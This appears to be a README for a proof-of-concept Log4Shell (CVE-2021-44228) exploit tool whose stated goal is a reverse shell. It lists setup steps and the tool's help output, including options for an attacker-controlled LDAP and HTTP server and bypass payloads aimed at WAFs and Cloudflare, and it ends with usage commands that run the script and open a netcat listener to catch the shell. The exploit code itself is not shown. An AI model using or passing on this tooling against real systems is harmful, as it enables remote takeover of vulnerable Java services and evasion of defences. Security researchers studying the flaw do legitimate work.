A Proof-Of-Concept Exploit for CVE-2021-44228 vulnerability.
Log4j, which is used to log security and performance information, impacts upwards of 3 billion devices that use Java across a variety of consumer and enterprise services, websites and applications, as well as medical devices and supporting systems.
Note: This is not a "point and click" exploit. The initial trigger payload will be generated, but injecting it into the appropriate place (i.e. HTTP header/chat/etc.) will be up to the user.
- python3
- pip install -r requirements.txt
- Install jdk1.8.0_20 and add bin folder to enviroment variable
usage: python CVE-2021-44228-exploit.py --help
[!] CVE: CVE-2021-44228
[!] This is simple Log4j exploit to get reverse shell
[!] Reference: https://akashpatil.me/log4j-guide-book.html
usage: CVE-2021-44228-exploit.py [-h] [--userip userip] [--webport webport] [--lport lport] [-b bypass]
log4shell Reverse shell exploit
optional arguments:
-h, --help show this help message and exit
--userip userip Enter IP for LDAPRefServer & Shell
--webport webport listener port for HTTP port
--lport lport Netcat Port
-b bypass, --bypass bypass
Type of bypass payload. None/WAF/Methods/Cloudflare. Methods - "ldap", "jndi", or the
${lower:x} method restriction bypass
- Run the script for Linux OS with bypass payload of method
python poc-csw.py --userip private-ip --webport 8888 --lport 9001 -b methods
2) run netcat on port 9001 in your local machine
nc -lvnp 9001